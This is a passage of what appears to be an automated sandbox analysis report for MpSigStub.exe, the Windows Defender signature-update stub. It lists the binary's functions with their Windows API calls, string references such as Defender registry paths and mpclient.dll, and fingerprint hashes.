UuidCreate.RPCRT4 ref: 00007FF7B57DD113
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF7B57DD2AE
EnterCriticalSection.KERNEL32 ref: 00007FF7B57DD2D3
LeaveCriticalSection.KERNEL32 ref: 00007FF7B57DD317

Strings

UpdateTelemetryCV, xrefs: 00007FF7B57DD086
UpdateTelemetryCV, xrefs: 00007FF7B57DD3A3
%u.%u.%u.%u, xrefs: 00007FF7B57DD25E

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ErrorLast$CountCreateEnterEnvironmentInitializeLeaveSpinUuidVariable
String ID: %u.%u.%u.%u$UpdateTelemetryCV$UpdateTelemetryCV
API String ID: 2766773415-2923726645
Opcode ID: 3ddfdf8de77cddc554b46bdad51efff4c156fbd3b4b3d87c01710dab2c7c3b5d
Instruction ID: 63bd018876587ec78a4ed28ee99f75c447ceec2c000de10c51fd1d2b95a92b16
Opcode Fuzzy Hash: 3ddfdf8de77cddc554b46bdad51efff4c156fbd3b4b3d87c01710dab2c7c3b5d
Instruction Fuzzy Hash: DFB18062B1874685FB10EB69E8402B9A3A1BFAAB84F844135DF4D5769FDF3CE150C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582ADEC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE ref: 00007FF7B582AE72
FindNextFileW.KERNELBASE ref: 00007FF7B582AED6
FindClose.KERNEL32 ref: 00007FF7B582AF0E
FindClose.KERNELBASE ref: 00007FF7B582AF26

Strings

%ls%ls*, xrefs: 00007FF7B582AE26
., xrefs: 00007FF7B582AEAF

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFile$FirstNext
String ID: %ls%ls*$.
API String ID: 1164774033-510034660
Opcode ID: 3e9542ec08dd546a3dee9a398768f113d8e17d11738c6b6e2c850871980f0365
Instruction ID: c890b5b4b1e301d22a19d5d9a7f829064e0fd1bf2f888e5246d7f675838e7174
Opcode Fuzzy Hash: 3e9542ec08dd546a3dee9a398768f113d8e17d11738c6b6e2c850871980f0365
Instruction Fuzzy Hash: 5841DA15A0C68281EB60BB19A440279E790AF66FA0FC40335EFAD436DFDF7DE4218760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582B030, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE ref: 00007FF7B582B05C

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

FindClose.KERNEL32 ref: 00007FF7B582B0C2
FindFirstFileW.KERNELBASE ref: 00007FF7B582B0D8

Strings

%ls%ls%ls, xrefs: 00007FF7B582B08D

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseErrorFirstLastNext
String ID: %ls%ls%ls
API String ID: 819619735-943730077
Opcode ID: 142f24242491c595b90dbd71319eea60a3be3963a81fc1008d24432f46ae79b6
Instruction ID: f5551c44e7baa0c1e21c7f0833189683271be6bea6976efbed002679526d0c1d
Opcode Fuzzy Hash: 142f24242491c595b90dbd71319eea60a3be3963a81fc1008d24432f46ae79b6
Instruction Fuzzy Hash: 4831EC2260A64282F621BB59A400379D7A0BF62FA1F944735DF6D475EFDF7DE4218320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DC444, Relevance: 6.2, APIs: 4, Instructions: 241nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00007FF7B57DC4EB
NtQueryInformationProcess.NTDLL ref: 00007FF7B57DC577
FindCloseChangeNotification.KERNELBASE ref: 00007FF7B57DC6C1

Part of subcall function 00007FF7B57C7204: TraceMessage.ADVAPI32 ref: 00007FF7B57C7281

CloseHandle.KERNEL32 ref: 00007FF7B57DC723

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseInformationProcessQuery$ChangeFindHandleMessageNotificationTrace
String ID:
API String ID: 1459743306-0
Opcode ID: 184a517e82a84c0ef6ecb0855b4b7007dfde92155a170ee0603f7c559fb27b2c
Instruction ID: 58b5c7b06374ff88e3a4cb674faa719d84a6366444202f9e42b406e37de0be83
Opcode Fuzzy Hash: 184a517e82a84c0ef6ecb0855b4b7007dfde92155a170ee0603f7c559fb27b2c
Instruction Fuzzy Hash: 3FA1B0A5B086028AEA50AB1DD4042B9A3A5AF6AF98F840131DF1D477EEDF3DE451C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57CEE54, Relevance: 26.8, APIs: 9, Strings: 6, Instructions: 563registryCOMMON

Download Yara Rule

APIs

RegisterTraceGuidsW.ADVAPI32 ref: 00007FF7B57CEF00
UnregisterTraceGuids.ADVAPI32 ref: 00007FF7B57CEF59
UnregisterTraceGuids.ADVAPI32 ref: 00007FF7B57CF052
UnregisterTraceGuids.ADVAPI32 ref: 00007FF7B57CF0F6
UnregisterTraceGuids.ADVAPI32 ref: 00007FF7B57CF1BB

Strings

Command: %ws, xrefs: 00007FF7B57CF320
MpSigStubMain, xrefs: 00007FF7B57CF612
yes, xrefs: 00007FF7B57CF331
Administrator: %hs, xrefs: 00007FF7B57CF345
Running X86 MpSigStub.exe on an X64 machine, xrefs: 00007FF7B57CF378
Version: %u.%u.%u.%u, xrefs: 00007FF7B57CF5F2

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: GuidsTrace$Unregister$Register
String ID: Administrator: %hs$Command: %ws$MpSigStubMain$Running X86 MpSigStub.exe on an X64 machine$Version: %u.%u.%u.%u$yes
API String ID: 3321944780-3500355390
Opcode ID: e178840d9eed205a5c7bdc82e18da384078fdb9a8819a4d3ce7af60403853ded
Instruction ID: c8f3fdd94fd284367c3a3fc0d230950a846dddddf263a9db3378286c7dfabe0b
Opcode Fuzzy Hash: e178840d9eed205a5c7bdc82e18da384078fdb9a8819a4d3ce7af60403853ded
Instruction Fuzzy Hash: 0F327021B09A8282EA65BB19E4402B9E3A0EF6BF50F944135DF4D476AFDF3DE450C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582FDB0, Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B58285B4: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000,00007FF7B582F089,00000001,?), ref: 00007FF7B58285CF

FreeLibrary.KERNEL32 ref: 00007FF7B582FEC9

Strings

GetFileVersionInfoExW, xrefs: 00007FF7B582FE88
GetFileVersionInfoSizeW, xrefs: 00007FF7B582FE50
GetFileVersionInfoSizeExW, xrefs: 00007FF7B582FE23
n, xrefs: 00007FF7B582FDF5
d, xrefs: 00007FF7B582FDFC
l, xrefs: 00007FF7B582FE03
GetFileVersionInfoW, xrefs: 00007FF7B582FE6B
r, xrefs: 00007FF7B582FDE7
VerQueryValueW, xrefs: 00007FF7B582FE9F
v, xrefs: 00007FF7B582FDE0
i, xrefs: 00007FF7B582FDEE

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHandleLibraryModule
String ID: GetFileVersionInfoExW$GetFileVersionInfoSizeExW$GetFileVersionInfoSizeW$GetFileVersionInfoW$VerQueryValueW$d$i$l$n$r$v
API String ID: 662261464-2898803832
Opcode ID: e06cabbfcd781edf657c03941c3197175d2d9ff9f44f80687771a919ab9a4466
Instruction ID: e7e299ab3d0e8ffb5afbfd53f30bfceb761f8fa43f4212dbc54ab122d5d45003
Opcode Fuzzy Hash: e06cabbfcd781edf657c03941c3197175d2d9ff9f44f80687771a919ab9a4466
Instruction Fuzzy Hash: 5D418E61B1874289FB00BB69E4510B9BBA1AF26B48FC00035DB0CA766FDF3DE165C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57D2D3C, Relevance: 19.9, APIs: 4, Strings: 7, Instructions: 672COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

Part of subcall function 00007FF7B582A660: CreateFileW.KERNELBASE ref: 00007FF7B582A6A1

FindCloseChangeNotification.KERNELBASE ref: 00007FF7B57D3413
CloseHandle.KERNEL32 ref: 00007FF7B57D34E2
CloseHandle.KERNEL32 ref: 00007FF7B57D358E
CloseHandle.KERNEL32 ref: 00007FF7B57D362B

Strings

Status, xrefs: 00007FF7B57D2F23
ProductGUID, xrefs: 00007FF7B57D311E
%ws, xrefs: 00007FF7B57D36CF
Disabled, xrefs: 00007FF7B57D2E83
Not found, xrefs: 00007FF7B57D32E7
Active, xrefs: 00007FF7B57D2E7C
212e9c34-cc85-497b-a25d-3896e21b5a77, xrefs: 00007FF7B57D2EC1

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Handle$ChangeCreateFileFindMessageNotificationTrace
String ID: %ws$212e9c34-cc85-497b-a25d-3896e21b5a77$Active$Disabled$Not found$ProductGUID$Status
API String ID: 634152788-219721074
Opcode ID: f2d1661dce9345baebb2af8012786ec9f812d5aafab89295bd1a5055d359d7ce
Instruction ID: 0623905640388788347bf3b79a73cf3e141315269ff4ea819b5711b96c4f169e
Opcode Fuzzy Hash: f2d1661dce9345baebb2af8012786ec9f812d5aafab89295bd1a5055d359d7ce
Instruction Fuzzy Hash: 5152C662B05A4686EB10AF2DD4502B9A3A0FB6AF94F944035DF0D577AEDF3DE442C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57CA520, Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 249COMMON

Download Yara Rule

Strings

MpOpen, xrefs: 00007FF7B57CA725
LoadLibraryEx(%ws, LOAD_WITH_ALTERED_SEARCH_PATH), xrefs: 00007FF7B57CA70D
%ws\mpclient.dll, xrefs: 00007FF7B57CA696
MpOpen succeeded(%#lx), xrefs: 00007FF7B57CA84B
PlatformUpdateTimeout, xrefs: 00007FF7B57CA656
MpOpen failed(%#lx), xrefs: 00007FF7B57CA863
MpClose, xrefs: 00007FF7B57CA77E
mpclient.dll, xrefs: 00007FF7B57CA66D
Waiting for service RPC server be available(%#lx), xrefs: 00007FF7B57CA82D

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %ws\mpclient.dll$LoadLibraryEx(%ws, LOAD_WITH_ALTERED_SEARCH_PATH)$MpClose$MpOpen$MpOpen failed(%#lx)$MpOpen succeeded(%#lx)$PlatformUpdateTimeout$Waiting for service RPC server be available(%#lx)$mpclient.dll
API String ID: 0-1014286389
Opcode ID: 194a4a683078e7d99a4fd621edba43430681dcd0b5938adaff9fcab44a67c1db
Instruction ID: 7c9594eedbd0f1be7c1984b84f0c092d640d6478cad9d387eb905052a78c1796
Opcode Fuzzy Hash: 194a4a683078e7d99a4fd621edba43430681dcd0b5938adaff9fcab44a67c1db
Instruction Fuzzy Hash: 8AB18C11B1864286FA15FA2DD8503B8A791AF66F95F904131CB1E872AFDF3DE852C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57D08C8, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FF7B57D08FE
GetDateFormatW.KERNELBASE ref: 00007FF7B57D0938
GetTimeFormatW.KERNEL32 ref: 00007FF7B57D098A
GetCurrentProcessId.KERNEL32 ref: 00007FF7B57D09DC

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

Strings

Start, xrefs: 00007FF7B57D09B0
Process: %ws, xrefs: 00007FF7B57D0A01
yyyy'-'MM'-'dd, xrefs: 00007FF7B57D091E
End, xrefs: 00007FF7B57D09BA
%ws time: %ws %ws, xrefs: 00007FF7B57D09C8
HH':'mm':'ss'Z', xrefs: 00007FF7B57D0973

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FormatTime$CurrentDateErrorLastProcessSystem
String ID: %ws time: %ws %ws$End$HH':'mm':'ss'Z'$Process: %ws$Start$yyyy'-'MM'-'dd
API String ID: 3257585305-3760239870
Opcode ID: e849a5ded246a74e068b0c640e77aa238d9eed7b0ae4cefd49a64d0a33f1c060
Instruction ID: 9a64c280f2a38a4a3798dd27fd718aae7e2564d811ac85127a1cc8353bf3c69e
Opcode Fuzzy Hash: e849a5ded246a74e068b0c640e77aa238d9eed7b0ae4cefd49a64d0a33f1c060
Instruction Fuzzy Hash: 38419262B0464689FB10EF29E4402FDA3A1EF6AB48F841132EF0D5369EEF38D155C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E2CC4, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 143registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B57E2FB0: RegCloseKey.ADVAPI32 ref: 00007FF7B57E3013

Part of subcall function 00007FF7B582C844: RegOpenKeyExW.ADVAPI32 ref: 00007FF7B582C877
Part of subcall function 00007FF7B582C844: RegCloseKey.ADVAPI32 ref: 00007FF7B582C8BD

RegCloseKey.ADVAPI32 ref: 00007FF7B57E2DD8
RegCloseKey.ADVAPI32 ref: 00007FF7B57E2E49
EventRegister.ADVAPI32 ref: 00007FF7B57E2EB9

Strings

MpEngineRing, xrefs: 00007FF7B57E2D8E, 00007FF7B57E2E0E
MpCampRing, xrefs: 00007FF7B57E2DA0, 00007FF7B57E2E20
Software\Microsoft\Microsoft Antimalware\MpEngine, xrefs: 00007FF7B57E2DEA
MpSignatureRing, xrefs: 00007FF7B57E2DB2, 00007FF7B57E2E32
MpSigStub.exe, xrefs: 00007FF7B57E2CCA
Software\Microsoft\Windows Defender\MpEngine, xrefs: 00007FF7B57E2D6A

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$EventOpenRegister
String ID: MpCampRing$MpEngineRing$MpSigStub.exe$MpSignatureRing$Software\Microsoft\Microsoft Antimalware\MpEngine$Software\Microsoft\Windows Defender\MpEngine
API String ID: 1606024965-1046620984
Opcode ID: 81714e49bc1bd882169f22c1de42fa992ea1203aaa5549563f621eda49010806
Instruction ID: d06d9946bf171cd61c3426df7f09eefe1091a85e44d5880083b8f74ba8fdcfe1
Opcode Fuzzy Hash: 81714e49bc1bd882169f22c1de42fa992ea1203aaa5549563f621eda49010806
Instruction Fuzzy Hash: B0618062A18B8691EB10AF19E8043B8B764FB2AF44F845231DB5D0776ECF3CD1A5C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DD5B4, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7B57DD63E

Part of subcall function 00007FF7B57DB158: FindCloseChangeNotification.KERNELBASE(?,?,00000000), ref: 00007FF7B57DB1A5

Part of subcall function 00007FF7B57DC444: NtQueryInformationProcess.NTDLL ref: 00007FF7B57DC4EB
Part of subcall function 00007FF7B57DC444: CloseHandle.KERNEL32 ref: 00007FF7B57DC723

GetCurrentProcessId.KERNEL32 ref: 00007FF7B57DD681
GetCommandLineW.KERNEL32 ref: 00007FF7B57DD76F

Strings

1.1.18500.10, xrefs: 00007FF7B57DD78A
MpSigStub.exe, xrefs: 00007FF7B57DD627

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CloseCurrent$ChangeCommandFindHandleInformationLineNotificationQuery
String ID: 1.1.18500.10$MpSigStub.exe
API String ID: 3847272435-2148062320
Opcode ID: 6c0ff932b9ba78cf198839fc415f4b76ddd92065336ee396fd3d93465b5f15e5
Instruction ID: 961b135466061dfd86df2a73cc9eb6e1986ec87950037c506c825504bd35d310
Opcode Fuzzy Hash: 6c0ff932b9ba78cf198839fc415f4b76ddd92065336ee396fd3d93465b5f15e5
Instruction Fuzzy Hash: 6B812432B05B4189EB00EBA9E8801AD77B4FB5AB54F904136DB8C17B6EEF38D055C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57D0A4C, Relevance: 8.9, APIs: 7, Instructions: 115COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7B57CF219), ref: 00007FF7B57D0A6B
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF7B57CF219), ref: 00007FF7B57D0A84
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF7B57CF219), ref: 00007FF7B57D0AAD

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 7210ba3fa811639bb92634b7f507b061f43698d6554d5c129ee230b62a6cbf6b
Instruction ID: 0a2012c6f4d395a507b4a304cadaab53550101899a05b3924f1692958cd4a9cb
Opcode Fuzzy Hash: 7210ba3fa811639bb92634b7f507b061f43698d6554d5c129ee230b62a6cbf6b
Instruction Fuzzy Hash: 7D418522B0D64B41EA56AB1DA800338E351FFAAF55F945534DB4E077EEEF3CE9518220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5828CB8, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B582C97C), ref: 00007FF7B5828D1C

Strings

IsWow64Process, xrefs: 00007FF7B5828DAD
IsWow64Process2, xrefs: 00007FF7B5828CE7

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess
String ID: IsWow64Process$IsWow64Process2
API String ID: 2050909247-131869486
Opcode ID: a6955c728c88278b5a745db84ecbf8bcf88491c09074fb68652a03d35e1d7cf6
Instruction ID: 66479c0a7267bd5b6c8c0fc0097d37eb856e3a6dd41aa2ec9c033bde44747f2c
Opcode Fuzzy Hash: a6955c728c88278b5a745db84ecbf8bcf88491c09074fb68652a03d35e1d7cf6
Instruction Fuzzy Hash: FA41D822A1874285FF50AF2CE4402B86B60AF36F48F985131DB4D4755FDF7DE4A58760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5828BC8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B582AB60: GetProcAddress.KERNEL32 ref: 00007FF7B582AB79

FreeLibrary.KERNEL32 ref: 00007FF7B5828C61
FreeLibrary.KERNEL32 ref: 00007FF7B5828C77
FreeLibrary.KERNEL32 ref: 00007FF7B5828C91

Strings

kernel32.dll, xrefs: 00007FF7B5828BE1
kernelbase.dll, xrefs: 00007FF7B5828BEF

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary$AddressProc
String ID: kernel32.dll$kernelbase.dll
API String ID: 1309337288-1959214522
Opcode ID: cf1a12f9883265d9011e390796f3483d6695691e6b1931ed79aedc61530c1eb3
Instruction ID: fcbe62d0ee950161966665ee994ac15cb44ed093dfa19cb212b2a03f2fb9e08a
Opcode Fuzzy Hash: cf1a12f9883265d9011e390796f3483d6695691e6b1931ed79aedc61530c1eb3
Instruction Fuzzy Hash: 40219321B09B4285EE806F19F844239E795AFA9FD0FA84530CB4D4735EDF7ED8608B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E2FB0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B582C844: RegOpenKeyExW.ADVAPI32 ref: 00007FF7B582C877
Part of subcall function 00007FF7B582C844: RegCloseKey.ADVAPI32 ref: 00007FF7B582C8BD

RegCloseKey.ADVAPI32 ref: 00007FF7B57E3013
RegCloseKey.ADVAPI32 ref: 00007FF7B57E302B

Strings

Software\Microsoft\Windows Defender\Features, xrefs: 00007FF7B57E2FBC
SenseEnabled, xrefs: 00007FF7B57E2FED
MpSigStub.exe, xrefs: 00007FF7B57E2FB0

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Open
String ID: MpSigStub.exe$SenseEnabled$Software\Microsoft\Windows Defender\Features
API String ID: 2976201327-3470383659
Opcode ID: e64642af8e463f8c5ea2b652f622471075943c4a235b8ae29fad941173a3d47a
Instruction ID: da37b1f21732bc7894e5d6f709806df3b10f3e56f503648ce3877285ed40a68c
Opcode Fuzzy Hash: e64642af8e463f8c5ea2b652f622471075943c4a235b8ae29fad941173a3d47a
Instruction Fuzzy Hash: F801B921A2C68182EB51A715E445379D764EF95B94FC01132F75F825AECF3CE195C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57D0EC4, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 215COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7B57D10F4

Strings

Directory, xrefs: 00007FF7B57D0F80
%ws, xrefs: 00007FF7B57D115F
UtilEnumFiles(%ws, *), xrefs: 00007FF7B57D0F46
IEnumFiles::Next(), xrefs: 00007FF7B57D1138

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: %ws$Directory$IEnumFiles::Next()$UtilEnumFiles(%ws, *)
API String ID: 2962429428-3950583265
Opcode ID: fcbec93558e97e8e19fa094f9af9077dcee8f6c638aa51bcedbc3d9a9fc48fa3
Instruction ID: 052347888ebff70c1025d4d5afd9c319c0747f9422c640e74d38a506ce7a7693
Opcode Fuzzy Hash: fcbec93558e97e8e19fa094f9af9077dcee8f6c638aa51bcedbc3d9a9fc48fa3
Instruction Fuzzy Hash: E591A162B1864295EB10BB69D9102BDA3A1AF6AF98F804131DF1D47BDEDF3DE505C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582C844, Relevance: 4.6, APIs: 3, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF7B582C877
RegCloseKey.ADVAPI32 ref: 00007FF7B582C8BD

Part of subcall function 00007FF7B57C3C8C: TraceMessage.ADVAPI32 ref: 00007FF7B57C3CF3

RegCloseKey.ADVAPI32 ref: 00007FF7B582C91F

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
